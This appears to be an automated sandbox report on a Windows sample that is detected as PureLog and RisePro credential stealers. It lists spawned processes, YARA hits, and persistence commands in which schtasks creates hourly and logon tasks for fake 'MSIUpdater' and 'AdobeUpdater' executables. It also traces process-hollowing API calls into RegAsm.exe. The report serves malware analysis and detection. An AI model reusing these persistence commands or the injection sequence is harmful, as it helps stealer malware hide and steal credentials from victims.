Start date:	06/05/2024
Path:	C:\Users\user\Desktop\OJa1BOigU3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\OJa1BOigU3.exe"
Imagebase:	0x110000
File size:	6'990'616 bytes
MD5 hash:	5158FED3EE415791BB7A7A3712373383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2277600314.000000000637F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2275260383.0000000006333000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2278188796.00000000068DA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000003.2165765311.0000000005E90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2275159782.0000000006301000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2275215754.0000000005E61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:53:08
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:53:08
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:53:08
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:53:08
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:53:09
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe"
Imagebase:	0xf40000
File size:	6'990'616 bytes
MD5 hash:	5158FED3EE415791BB7A7A3712373383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	07:53:09
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Imagebase:	0x640000
File size:	6'990'616 bytes
MD5 hash:	5158FED3EE415791BB7A7A3712373383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 45%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	07:53:09
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe
Imagebase:	0x640000
File size:	6'990'616 bytes
MD5 hash:	5158FED3EE415791BB7A7A3712373383
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	07:53:11
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	07:53:11
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	07:53:12
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:53:12
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:53:12
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe"
Imagebase:	0xbb0000
File size:	483'440 bytes
MD5 hash:	46C72D686C836F3C97CE18B81B0D9864
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000F.00000000.2287643902.0000000000BB2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\U8cABsPhZFkKRrQ4rE0N.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:53:12
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xa0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:53:12
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x620000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\v6ggwc2fJXXgIu5fzDQ2.exe"
Imagebase:	0x390000
File size:	1'896'048 bytes
MD5 hash:	3A2BDF3F22AF20AE6E0F2552C9301222
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:53:14
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Imagebase:	0x110000
File size:	1'896'048 bytes
MD5 hash:	3A2BDF3F22AF20AE6E0F2552C9301222
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 62%, ReversingLabs Detection: 60%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:53:20
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe"
Imagebase:	0x710000
File size:	6'990'616 bytes
MD5 hash:	5158FED3EE415791BB7A7A3712373383
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 45%, ReversingLabs Detection: 42%, Virustotal, Browse
Has exited:	false

Show Windows behavior

Target ID:	25
Start time:	07:53:20
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x770000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	07:53:21
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe
Imagebase:	0x110000
File size:	1'896'048 bytes
MD5 hash:	3A2BDF3F22AF20AE6E0F2552C9301222
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:53:21
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 276
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:53:21
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 HR" /sc HOURLY /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:53:21
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:53:22
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Imagebase:	0xd30000
File size:	483'440 bytes
MD5 hash:	46C72D686C836F3C97CE18B81B0D9864
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 30%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:53:22
Start date:	06/05/2024
Path:	C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe
Imagebase:	0x970000
File size:	483'440 bytes
MD5 hash:	46C72D686C836F3C97CE18B81B0D9864
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	07:53:22
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH1\MPGPH1.exe" /tn "MPGPH1 LG" /sc ONLOGON /rl HIGHEST
Imagebase:	0xaf0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:53:22
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:53:25
Start date:	06/05/2024
Path:	C:\ProgramData\MPGPH1\MPGPH1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH1\MPGPH1.exe
Imagebase:	0x480000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:53:25
Start date:	06/05/2024
Path:	C:\ProgramData\MPGPH1\MPGPH1.exe
Wow64 process (32bit):	true
Commandline:	C:\ProgramData\MPGPH1\MPGPH1.exe
Imagebase:	0x190000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:53:26
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:53:26
Start date:	06/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:53:26
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000028.00000002.2783994618.0000000001057000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:53:26
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x8f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.2784153638.0000000000DEB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:53:27
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xd60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	43
Start time:	07:53:27
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x520000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:53:27
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xf60000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	47
Start time:	07:53:28
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 288
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:53:28
Start date:	06/05/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 248
Imagebase:	0x790000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:53:29
Start date:	06/05/2024
Path:	C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\AdobeUpdaterV1_93c4750d07be7885c8f839a66372e48f\AdobeUpdaterV1.exe"
Imagebase:	0x420000
File size:	483'440 bytes
MD5 hash:	46C72D686C836F3C97CE18B81B0D9864
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 30%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:53:30
Start date:	06/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x3a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	40%
Total number of Nodes:	20
Total number of Limit Nodes:	0

Executed Functions

Function 02F897F1 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 02F89960
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F89973
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 02F89991
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F899B5
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 02F899E0
TerminateProcess.KERNELBASE(?,00000000), ref: 02F899FF
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 02F89A38
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 02F89A83
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F89AC1
Wow64SetThreadContext.KERNEL32(?,?), ref: 02F89AFD
ResumeThread.KERNELBASE(?), ref: 02F89B0C

Strings

Load, xrefs: 02F8982F
aryA, xrefs: 02F89837
GetP, xrefs: 02F89873
ress, xrefs: 02F8987B

Memory Dump Source

Source File: 0000000F.00000002.2290863515.0000000002F89000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F89000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f89000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: GetP$Load$aryA$ress
API String ID: 2440066154-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: e703799100435ab54dfa241cfe6cd75ee9b07dc3debbcc78b3e277b14221a818
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 3EB1E67664028AAFDB60CF68CC80BDA77A5FF88754F158524EA0CAB341D774FA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01350C38 Relevance: 8.2, Strings: 6, Instructions: 706
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

xbaq, xrefs: 01350C99
Te^q, xrefs: 01350FAD
TJcq, xrefs: 01350CB8
4'^q, xrefs: 0135126A
TJcq, xrefs: 01350FCE
pbq, xrefs: 013512A9

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID:
String ID: 4'^q$TJcq$TJcq$Te^q$pbq$xbaq
API String ID: 0-50452399
Opcode ID: 4a7e5bb3b2a740aaff576f294090be7a2b516fb61a57f55dbd43db7b51ba2eef
Instruction ID: bea4b46991f058cea7457942f867d5ad5d90e4a2cad7ffe59c7f842a292ac647
Opcode Fuzzy Hash: 4a7e5bb3b2a740aaff576f294090be7a2b516fb61a57f55dbd43db7b51ba2eef
Instruction Fuzzy Hash: 58521575A002189FCB59DF68C984F69BBB2FF48708F1585A8E5099B276CB31EC81CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013526B0 Relevance: 1.6, APIs: 1, Instructions: 69
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateRemoteThread.KERNELBASE(?,?,?,?,00000000,?,?), ref: 01352754

Memory Dump Source

Source File: 0000000F.00000002.2290301801.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1350000_U8cABsPhZFkKRrQ4rE0N.jbxd

Similarity

API ID: CreateRemoteThread
String ID:
API String ID: 4286614544-0
Opcode ID: f9aab0012291b227a3ebab8fbea929948215f312e6438fba150346a0e375257f
Instruction ID: 60e3c5851793d0be16f3dde13cb1fc2020bd5e666b5ce20c3a48242b6583f610
